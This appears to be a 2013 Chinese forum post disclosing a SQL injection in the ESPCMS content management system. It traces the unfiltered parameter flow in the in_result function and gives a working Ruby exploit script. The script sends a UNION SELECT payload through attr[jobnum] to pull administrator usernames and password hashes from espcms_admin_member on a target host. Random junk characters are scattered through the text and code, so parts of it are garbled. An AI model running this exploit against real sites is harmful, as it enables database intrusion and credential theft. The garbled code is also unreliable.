0×0 漏洞概述0×1 漏洞细节
* X C. A8 @ H4 S* }0×2 PoC3 x% w5 s7 A; J+ L* Z5 A: C! v7 X
+ E0 h: Z0 F" i! r8 N- N9 {7 G
( n. ?5 L! x1 ~+ F* _' H1 K
( B% p% C0 b* F8 X$ o/ r% n0×0 漏洞概述
3 D0 s2 V1 r" F) w& \" U. W
2 t2 h& W- Q$ Q' Z易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
0 V$ V5 j$ i2 u( K其在处理传入的参数时考虑不严谨导致SQL注入发生
3 Q, ^0 y ~& |9 E/ M- W3 d9 [
* F: \) ?* F, v& C6 ?" O( W' N
# z! [- p' [- G i+ ~. h: i6 M0×1 漏洞细节
3 |$ }& n7 Z- s T9 I4 W
' T6 m9 l+ ?2 O. s4 q+ i变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
9 P F. V, h1 \& u" c* X; l正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
+ ~" [4 _ a7 ^. i而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
1 m$ W6 d4 Y# Q1 u/ H& ^% q7 X
在/interface/3gwap_search.php文件的in_result函数中:
5 ~$ F" i7 ^0 k
5 R6 { L; Y0 G/ R0 H2 s
; q* t. o+ O. t
0 q' F! V8 R8 w4 @/ S/ q) i+ p: x function in_result() {
! ~+ A1 k1 a9 w$ }2 ^- i5 i ... ... ... ... ... ... ... ... ...
4 `% p; A; [8 ~2 ~5 O3 m( D/ g) u- i4 v $urlcode = $_SERVER[ 'QUERY_STRING '];
) y- M: H9 T' O3 H: z: x Z parse_str(html_entity_decode($urlcode), $output);- `" {& E7 @. e6 i3 @
; A7 B* K2 ?8 t+ [ w% t* b ... ... ... ... ... ... ... ... ...6 I! P; \& G% R7 Q' ^
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
0 W0 R* l4 k5 Z4 o( i/ d+ l
8 I) c' j2 [2 J" x7 ^& j# ~8 s1 @ $db_table = db_prefix . 'model_att';( q) W# {7 q) N& R
7 A( Z9 E# Y! h, o8 [, n- N) |- _
foreach ($output['attr' ] as $key => $value) {
4 J4 o, H5 u1 q) J7 q if ($value) {3 s& T% w3 W# g2 \% r6 W
7 N6 K3 T1 @, f d. i: _3 o9 }: q
$key = addslashes($key);5 p2 q" }6 h3 C5 Q, W
$key = $this-> fun->inputcodetrim($key);4 {; K5 X2 ^0 @' i- s" j8 b5 P
$db_att_where = " WHERE isclass=1 AND attrname='$key'";8 H9 r1 p5 L* k. G3 z7 |/ d
$countnum = $this->db_numrows($db_table, $db_att_where);
* W: E4 b. e: s7 T8 o if ($countnum > 0) {
, c" a s& b; I3 X $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;) j/ V) @- ~% X; @2 e
}2 Y+ v" n: ~, x6 F
}
7 L$ W; \: K0 j: \* L9 d }: D# M0 k4 j. M# s% e0 ~
}
]1 B& E+ N1 n if (!empty ($keyword) && empty($keyname)) {
) k& v4 P+ e x6 _! k $keyname = 'title';7 R7 A# l5 w i: q6 @
$db_where.= " AND a.title like '%$keyword%'" ;' x8 z$ l2 C+ T2 c+ m0 A5 u
} elseif (!empty ($keyword) && !empty($keyname)) {
$ S8 n8 p0 P9 O; B i3 {2 C% b# H $db_where.= " AND $keyname like '% $keyword%'";
/ g9 T9 p$ N6 B6 D8 V; n }5 Q4 A2 x, `) x; ^) s Y
$pagemax = 15;
/ Q: F& q x. `# Q: l' z, a/ F$ ~& ?7 x& S9 K: p- K
$pagesylte = 1;
* v: I1 U I1 r9 K' ~2 h& ^: ^ |* W# X( a* R" \1 S/ o
if ($countnum > 0) {( J$ g+ F1 J+ X; J: W7 {8 k: E
' ~9 j0 n2 D4 `0 H7 U$ A
$numpage = ceil($countnum / $pagemax);6 |3 w, ]' ?. m9 f2 q. Z* Q
} else {: x7 c( [# p; a# s* I
$numpage = 1;* B, U/ V p! l8 L2 w
}0 j E; t' m4 v
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
7 ~& y& j) f5 f' T+ V, X $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
8 T, q% b( F! ?" Y1 |4 r$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
8 H8 k% i8 W" d& Z9 r( f ... ... ... ... ... ... ... ... ...
+ M9 M/ u; s( y4 r }# i& u7 O$ ]' N* y
1 Z7 ]' b& Y% _
* m/ Z. h3 ^9 W2 s( E* h0×2 PoC. N: [, N6 Q' V. w
' s) g" l4 }( ?% Y9 G. v; ?& Q5 m
, @7 |: E9 \1 m! T# ]. T& L9 U0 z# [
require "net/http"
4 l# a8 v* I& N. w9 K4 K
; R) z3 Q/ k" \# [& m# T6 }def request(method, url); M( F- T* `$ q; v; \! Z" w
if method.eql?("get")
" Z/ P6 m. R2 j1 _1 t- ]+ [3 U uri = URI.parse(url)
# I( s `% A2 v. o2 s http = Net::HTTP.new(uri.host, uri.port): Y* A1 u" e4 E" c+ o1 T, K! g2 }
response = http.request(Net::HTTP::Get.new(uri.request_uri))0 @% q! W2 S$ D( K8 G% W/ E7 ~ E1 j
return response
$ L+ d; a& J# G0 n0 A6 W5 x/ l! K end
1 n/ i/ C* J; G- O: Kend
) P" F& \% M8 U& W7 Y# O; q% V# [
doc =<<HERE
; F! w' O# @, v4 y6 z-------------------------------------------------------0 g9 N& Q9 k' Z" r) j
Espcms Injection Exploit; O7 B0 T3 `' ?0 Y9 z/ [
Author:ztz
9 I2 O4 v2 h! m4 e% S% hBlog:http://ztz.fuzzexp.org/
' r% H6 s- K" C0 |-------------------------------------------------------
- W& U) }/ w, Y$ u; n, x+ o5 M/ S) M1 I
HERE: e+ S% ~% m G- A
3 R+ v; c1 F* L. X$ q( j( G2 k
usage =<<HERE% O2 B3 B+ X% x
Usage: ruby #{$0} host port path
6 X6 t( D# M0 Y3 _! R5 m" Z/ texample: ruby #{$0} www.target.com 80 /: |6 z5 m5 }3 k! q( G& E, q
HERE+ t$ O4 o: C9 d _2 Y* x
6 _/ O! g; W% o; Oputs doc
* Q& t5 t( c# s% T4 A9 d8 gif ARGV.length < 3
5 X1 _; @# N6 k) M+ V* Y3 } puts usage
" i: I! m5 B& _9 G& ]; ~else
: l# Z# w" o4 h2 B $host = ARGV[0]. B5 [; k5 d! e* v1 d- @
$port = ARGV[1]" i4 u; U1 f& t5 O
$path = ARGV[2]8 w J9 ~1 B5 W. r3 q+ r6 r
. h( F3 ^2 E/ v puts "send request..."
7 L& Q* N' l& c. Y9 X url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&3 S7 o+ O8 k- F. k9 x, a. P' A+ N
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
9 t- q5 S. M# _* g6 B,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27; p8 A$ \8 i8 X4 A' i
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
* l) X) r+ y: t response = request("get", url)
# {& P- t3 f' F result = response.body.scan(/\w+&\w{32}/). l" `+ K2 R2 D
puts result
' h9 w" V% R" |8 n8 o8 E1 Z1 ~+ t( rend7 ]6 ]/ U* R+ s n: g$ P' Q7 e5 r. Y
) o4 K& J# O6 b/ m6 u& [& P2 E
|
发表于 2013-7-27 18:31:52
收藏
支持
反对